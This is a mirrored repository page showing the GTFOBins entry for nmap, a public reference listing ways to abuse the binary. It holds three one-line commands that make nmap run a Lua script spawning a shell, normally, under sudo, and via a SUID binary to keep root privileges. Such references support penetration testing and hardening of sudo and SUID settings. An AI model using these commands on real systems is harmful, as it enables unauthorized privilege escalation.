This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-18 01:24:56 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
0ba5df0cb984fd631efbf55a5adc8ec717720432
GTFOBins.github.io
/
_gtfobins
/
nmap.md
Emilio Pinna
14c8781f2d
Fix nmap description and temporary file
2018-08-19 11:20:37 +01:00
576 B
Raw
Blame
History
functions
functions
execute-interactive
sudo-enabled
suid-enabled
description
code
Echoing of input characters is disabled.
TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF nmap --script=$TF
description
code
Echoing of input characters is disabled.
TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF sudo nmap --script=$TF
description
code
Echoing of input characters is disabled.
TF=$(mktemp) echo 'os.execute("/bin/sh -p")' > $TF ./nmap --script=$TF
Reference in New Issue
View Git Blame
Copy Permalink